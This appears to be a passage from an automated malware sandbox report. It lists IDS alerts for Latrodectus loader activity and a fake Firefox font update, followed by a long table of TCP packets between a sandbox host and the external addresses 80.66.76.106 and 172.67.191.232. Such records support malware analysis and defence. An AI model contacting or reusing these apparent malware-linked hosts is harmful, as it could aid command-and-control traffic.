                                                                                                                                                          2024-11-13T11:03:20.528808+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858112172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:21.409415+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858114172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:23.232250+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858114172.67.191.232443TCP

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 13, 2024 10:59:23.493935108 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:23.498780012 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:23.498838902 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:23.534854889 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:23.539695978 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:29.721121073 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:29.721151114 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:29.721169949 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:29.721180916 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:29.721281052 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:29.721281052 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:29.770627022 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:29.785088062 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:36.437524080 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:36.437602043 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:36.446918964 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:36.453592062 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:58.140455008 CET88774970580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:58.140543938 CET497058877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:58.141598940 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:58.146780014 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:58.146878004 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:58.147202969 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 10:59:58.152236938 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:01.036990881 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:01.037087917 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:01.037544966 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:01.038780928 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:01.042448997 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:01.043991089 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054543972 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054574966 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054593086 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054608107 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054625988 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054634094 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054686069 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054686069 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054693937 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054712057 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054730892 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054744959 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054757118 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054775000 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.054790020 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.054831982 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.055382967 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.055429935 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.055460930 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.055505037 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.060288906 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.060342073 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.060522079 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.060575962 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173367977 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173470020 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173562050 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173577070 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173603058 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173616886 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173616886 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173619032 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173652887 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173652887 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173727989 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173754930 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.173789978 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.173789978 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174292088 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174355984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174401045 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174444914 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174489975 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174505949 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174523115 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174535990 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174571991 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174571991 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.174611092 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.174662113 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292177916 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292213917 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292226076 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292257071 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292278051 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292278051 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292304993 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292315960 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292318106 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292336941 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292356014 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292676926 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292710066 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292720079 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.292726994 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292753935 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.292753935 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293040991 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293090105 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293139935 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293188095 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293241024 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293282032 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293292999 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293306112 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293350935 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293350935 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293386936 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293435097 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293939114 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293950081 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.293996096 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.293997049 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.410957098 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.410981894 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.410991907 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411026955 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411045074 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411045074 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411139011 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411171913 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411223888 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411235094 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411246061 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411256075 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411283970 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411325932 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411767960 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411818981 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411984921 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411993980 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412030935 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412034035 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412043095 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412065029 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412065029 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412091017 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412365913 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412379026 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412389040 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412425041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412425041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.457911968 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.458036900 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.458040953 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.458141088 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.529881001 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530003071 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530010939 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530024052 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530077934 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530081034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530081987 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530091047 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530102968 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530128956 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530165911 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530424118 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530478001 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530518055 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530565977 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530883074 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530930042 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530976057 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530986071 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531029940 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531029940 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531075954 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531105042 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531116962 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531127930 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531153917 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531155109 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531447887 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531497955 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531518936 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531562090 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531636000 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531653881 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531687975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531687975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.620917082 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.621016026 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.621143103 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.621283054 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649113894 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649180889 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649389029 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649400949 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649411917 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649422884 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649435043 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649447918 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649482965 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649770021 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649780989 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649791956 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649826050 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649858952 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277231932 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277280092 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277292013 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277323008 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277340889 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277350903 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277364016 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277400970 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277477980 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277478933 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277489901 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277502060 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277532101 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277559996 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.278182030 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.278239965 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.278409958 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.278409958 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396480083 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396538019 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396598101 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396631002 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396666050 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396699905 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396766901 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396800995 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396828890 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396828890 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396830082 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396836042 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396863937 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396874905 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396923065 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396941900 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397067070 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397123098 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397131920 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397157907 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397171974 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397207975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.398142099 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.398180008 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.398209095 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.398247957 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515333891 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515501976 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515522003 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515544891 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515582085 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515602112 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515616894 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515635014 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515650034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515650034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515650034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515650034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515674114 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515692949 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515696049 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515722036 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.515722990 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515749931 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.515768051 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.516164064 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.516199112 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.516228914 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.516232014 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.516249895 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.516252041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.516279936 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.516289949 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.516379118 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634488106 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634541988 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634593964 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634593964 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634603024 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634639025 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634659052 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634675026 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634689093 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634730101 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634733915 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634768009 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634804964 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634810925 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634810925 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634843111 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.634844065 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634874105 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.634876966 CET88775808180.66.76.106192.168.2.8
